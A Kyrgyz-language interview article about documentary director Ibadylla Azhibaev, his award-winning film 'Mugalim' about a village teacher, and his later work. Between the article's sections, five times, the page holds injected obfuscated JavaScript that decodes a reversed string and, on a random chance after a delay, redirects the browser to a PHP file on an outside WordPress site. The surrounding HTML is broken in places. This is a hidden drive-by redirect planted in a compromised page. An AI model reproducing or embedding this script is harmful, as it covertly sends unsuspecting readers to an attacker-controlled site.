Режиссёр Ибадылла Ажибаевдин “Мугалим” даректүү тасмасы Түркиянын Анкара шаарында өткөн “Түрк дүйнөсү” фестивалына катышып, башкы сыйлыкты багындырды. Сыйлыкты Чынгыз Айтматов кино үйүндө Кыргыз эл жазуучусу Султан Раев өзү тапшырган. Улуттук онкология борборунда онкогинеколог-радиолог, психолог болуп иштеп жүрүп, пенсияга чыккан Ибадылла Ажибаев даректүү тасмасы жана режиссёрлук тууралуу өз оюн айтып берди.
Жашоого көзү каныккан адам гана режиссёр боло алат
Жаш курагым улуу, бирок, эң жаш режиссёрмун. Сүрөт тартчу элем. Бир күнү сүрөтчү досум: “Киного тартылып жүрө бербей, өзүң тартып көр. Режиссёрлукту оку”, — деп сунуштады. Буга чейин кино тартууну окуса болот деп такыр ойлобоптурмун. Ал мени режиссёр Темир Бирназаровдун бир жылдык курсуна алып барды. Маектешүү учурунда: “Врач, психолог турбайсызбы. Жашыңыз да бир топко барыптыр. Сиз кино тарта аласыз. Чыгармачылык куржунуңуз толо. Кино тартуудан кыйналбайсыз”, — деген Темир Бирназаровдун сөзү мени абдан шыктандырды. Ооба, союз мезгилинде 25 жаштан кийин гана режиссёрлукка аттанышчу. Анткени адамдын жашоого көзү каныгыш керек. Ошентип бир жыл окуп, Нарын облусундагы Жумгал районунун Өрнөк айылынан “Фельдшер” даректүү тасмасын тарттым. Фельдшер аял ат менен айылдарды кыдырып, элдин ден соолугуна кам көрөт экен. Ошол даректүү тасманы тартып жүрүп Кең-Суу кыштагындагы мугалим көзүмө урунду. Анын адамгерчилиги, балдарга кылган мамилеси, айыл ичиндеги кадыр-баркы, мекенчилдиги жогору экен. Даректүү фильмге сонун каарман болчудай деп ойлодум. Борбордон таппаган каарманды алыскы айылдардан табасың.
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/04/gshg.jpg» alt=»» class=»wp-image-5990″/>

“Мугалим” тасмасы багындырган бийиктиктер

Баарынан да мугалимди көндүрүү керек эле. Мугалим Токтожума Стахановго “Сиз жөнүндө кино тартайын”, — дегенимде эле мени урушту. “Журналисттер, киночулар айылдагы начар жашоону, электр жарыгы жок, окуганга шарты жок айылды көрсөтөм дейсиңер”, — деп ачууланды мага. “Сиздин патриоттугуңузду, балдар билим алсын деген аракетиңизди, келечек муунду тарбиялооңузду тартып элге көрсөтөлү. Жаштар сизден үлгү алышсын”, — деп телефон номеримди калтырдым. Качан чалат деп күттүм. 4 айдан кийин телефон чалып, сиздин баамдаганыңыз туура экен деп макулдугун берди. “Мугалим” даректүү тасмасы бир жыл бою тартылды. Кыш, жаз, жай, күз мезгилдеринде жумалап мугалимдин, окуучулардын жанындамын. Ошентип 2018-жылы дебьюттук фильмди да, окуумду да аяктадым. “Кыргызстан кыска метраждуу фильмдердин мекени” фестивалына катышып “Мугалим” башкы байгени багындырды.

Даректүү фильмдерди тартып жүргөн режиссёр Асел Жураева “Мугалимди” көргөндөн кийин чет өлкөлөрдөгү фестивалдарга катышууга кеңеш берди. Ошондон тарта чет өлкөлөргө чыгууга үмүт байладык. Россиянын бир катар шаарларын кыдырдык. Көп өтпөй Казан шаарындагы “Мусулмандар киносу” фестивалына катыштык. Ага 40тан ашуун өлкөдөн 170тей кино катышып, баш байгени “Мугалим” жеңди. Екатеринбург, Уфадан бир катар дипломдорго ээ болдук. Ага удаа Кабардино-Балкариядагы фестивалга катышканда эң башкы сыйлык 100 миң рубль ыйгарылды. Бул фестивалдын түптөөчүсү да мугалим болуп иштеп, кудум документалдык тасмадагы образ анын жашоосуна жакын экен. Ал дагы айылдын чакан мектебинде башталгыч класстарга билим берчү экен. Кабардино-Балкариядан түз Германияга өттүм. Мында да фестивалдагы эң башкы сыйлыкты багындырдык. Буга удаа Тажикстанда да көрсөтүлдү. Ошентип “Мугалим” тасмасы менен дүйнөнүн бир катар өлкөлөрүн кыдырдык. Дүйнөгө белгилүү актёрлор, режиссёрлор менен кинофестивалдарга бирге катышуу кандай бакыт. Алардын киносун көрүп, салыштырып сабак аласың. Дүйнөдөгү киночеберлердин арасында эмгегиң башкы байгелерге ээ болгону өзүнчө керемет. Чет өлкөлөрдөн келгенден кийин Төлөкан Исмаилова өткөрүп жүргөн “Бир дүйнө” фестивалында да эң башкы сыйлык ыйгарылды. Бул фестивалга Американын Кыргызстандагы элчиси Дональд Лу катышты. Ал кинодогу мугалимдин образын жактырып, Токтожума Стахановду окуучулары менен бирге Голливудга эс алып келүүгө чакырды. Бирок, өткөн жылы коронавирус пандемиясынан улам барбай калдык.

<figure class=)
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/04/whatsapp-image-2021-02-03-at-12.59.23-1.jpeg» alt=»» class=»wp-image-5991″/>

Университетти таштап, кичи мекенине кайткан Стаханов

Тасманын сюжетинде жогорку окуу жайды кызыл диплом менен аяктап, Жусуп Баласагын атындагы Кыргыз мамлекеттик университетинде окутуучу болуп иштеген Токтожума Стаханов кызматын таштап Жумгалдын Кең-Суусуна 2014-жылы кайтат. Кең-Суу Кабак айыл өкмөтүнө карайт. Жада калса ал айылда электр жарыгы да жок. 17 түтүн жашаган кичинекей кыштакчанын абалын көргөн мугалим башталгыч класстын 12-14 окуучусун үйүндө окутат. Эгер Токтожума агай кичи мекенине келбегенде окуучулар билимден аксамак же коңшу айылдардын мектебине барышмак. А бирок, кыштын суугунда, күн кыскарганда кантип барып, келип билим алышат? Мугалим кичи мекенин тандаганы айылдаштары үчүн оголе жакшы болду. Анткени балдары билимсиз калат же коңшу айылдан качан келет деп санааркашпайт. Кең-Сууга келгенден кийин өз үйүн мектеп кылып ачат. Ал үчүн окуучулардын билиминен өткөн байлык жок. Сабакты баштаардан мурда Кыргызстандын гимнин ырдашат. Эки бөлмөлүү мектепте 1, 2, 3, 4-класстын окуучуларын бир эле убакытта окутуп, ар бир класска сабагын өтөт.

<figure class=)
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/04/lk.jpg» alt=»» class=»wp-image-5992″/>

Мугалимдин эмгеги баасын алды

Ооба, даректүү тасма тартылган соң мага караганда мугалим таанылып, ага ийгилик алып келди. Аны мамлекеттик сыйлыкка көрсөттүм. Ага экс-президент Сооронбай Жээнбеков Кыргыз Республикасынын эмгек сиңирген мугалими деген наам ыйгарды. Мындан сырткары Жогорку Кеңештин депутаты Марлен Маматалиев фильмден таасирленип, айылга мектеп куруп берүүнү демилгеледи. Коңшу айылга барып келип окуп келүү үчүн окуучуларга микроавтобус да берилди. Агартуусуз илим өнүкпөйт, дарыгерлерсиз ден соолук чыңалбайт. Эки кесип ар дайым эриш-аркак жашайт. Айыл араласаң өз ишине берилген эмгекчил адамдарды көрөбүз. Алар келечек муунга үлгү боло алат. Эл арасында өз ишинин усталары, каймактары бар. Журналисттердин көбү таанымал депутаттарга, артисттерге, академик, профессорлорго басым жасашат. Тандаган темамдын өзөгүн мугалимдин жашоосу, окуучуларга деген сүйүүсү, өрнөктүү эмгеги, мекенчилдиги түздү. Учурда электр жарыгы жок, жашоосу кыйла татаал айылга жаш мугалимдер, врачтар келбейт. Келсе да 2 ай араң чыдашы мүмкүн. Мисалы, “Догдур апа” документалдуу тасмада фельдшер аял 68 жашта, пенсияга 58 жаштан чыгат. Пенсияга чыкканына карабай, жаштар келбегенден улам ат менен айылдарды кыдырып иштеп жүрөт.

<figure class=)
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/04/whatsapp-image-2021-02-03-at-12.59.23.jpeg» alt=»» class=»wp-image-5993″/>

“Догдур апа” даректүү фильми тартылды

Жакында эки даректүү фильм тарттып бүттүм. Жалал-Абаддын Сузак районундагы Алчалы, Ак-Булак айылдарын 68 жаштагы аял ат менен кыдырып, элдин саламаттыгына кам көрөт. Бул тасмамды “Догдур апа” деп атадым. Айылдыктар аны “Железная леди” дешет. Чынында өзү чөп чабат, малын өзү карайт айтор, тынымы жок экен. Фельдшердин жашоо образы камтылган даректүү тасманы Кинематография департаменти каржылап беришти.

Акырында COVID вирусу Кыргызстанга кирип, өзгөчө кырдаал жарыяланып, карантинге алынганда тарттым. Шаар араласаң жан жок, тым-тырс. Кудум коркунучтуу фильмдегидей көрүнүш. Борбордо эч ким жок, бирин-серин автоунаалар гана жүрөт. Кол көтөрсөң эч ким албайт. Баары коркушат. Вирус бир эле Бишкекти каптаган жок. Ошондуктан оору каптаган очоктордон Ысык-Көлдүн Караколу, Нарын шаары, Ат-Башы району, Жалал-Абад шаары, Сузак фильмге тартылды. Бир гана Талас менен Баткен тартылган жок. Анткени ал учурда бул облустарда вирус чыга элек эле.

<figure class=)
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/04/whatsapp-image-2021-02-03-at-12.59.24.jpeg» alt=»» class=»wp-image-5994″/>

Ырларымды атактуу ырчылар ырдап жүрүшөт

Адам баласы өмүрүбүз өткөнчө окуучу, үйрөнчүк болот экенбиз. Улуттук онкология борборунда онкогинеколог, радиолог болуп иштедим. Нур менен иштеген врачтар 50 жашында эле пенсияга чыгат. Анткени адам өмүрүнө нур терс таасирин тийгизет. Оорукананын атын укканда эле адам жүрөгү титирейт эмеспи. Ал эми анда дарыланган оорулуулар жакшы кабар, өмүр шооласын бир кудайдан жана врачтан издейт. Мындайда аялдар эле эмес, эркектер да психологиялык жактан чөгүп кетет. Анткени дарылангандар арасында өмүр суусу түгөнөөрүнө аз калгандар да бар. Аларга жардам берүүдө врачтар психолог болуусу зарыл. Ошондуктан Баласагын атындагы КМУдан психолог кесибине да ээ болдум.

1997-жылы “Будь здоров” гезитин түптөгөндөн кийин кино тармагына аралаша баштадым. Кээ бир кинолордо сунуштаган ролдорун аткардым. Алсак, режиссёр Жаныш Кулманбетовдун “Японечка” көркөм фильмине Гүлшайыр Садыбакасова менен бирге тартылдым. “Кыздардын өч алуусу” киносунда жана Темир Бирназаров тарткан дагы бир кинодо врачтын ролун ойнодум.

Чыгармачылык жаатта акын Байдылда Сарногоев далай кеп-кеңешин уктум.

“Ак калпакты кие бил,

Ала-Тоо элин сүйө бил.

Акындык жагың бар экен,

Алдыга койгон ой-тилегиңди

Ойдогудай сүрө бил”, — деп ак батасын да берди. Байдылда атабыздын батасы тийдиби “Ата конуш” китебимди чыгардым. Ушул китеп жарыкка чыгаар менен бир топ ырларыма белгилүү композиторлор обон жазышты. Кудайга шүгүр, учурда Султан Каримов, Каныкей Эралиева, Алтынбек Сапаралиев, Садыр Жумашев, Атайбек Бөдөшов, Айбек Касымов, Айчүрөк Иманалиева жана башка ырчылар ырдап жүрүшөт.

Асел Барыктабасова

<footer class=)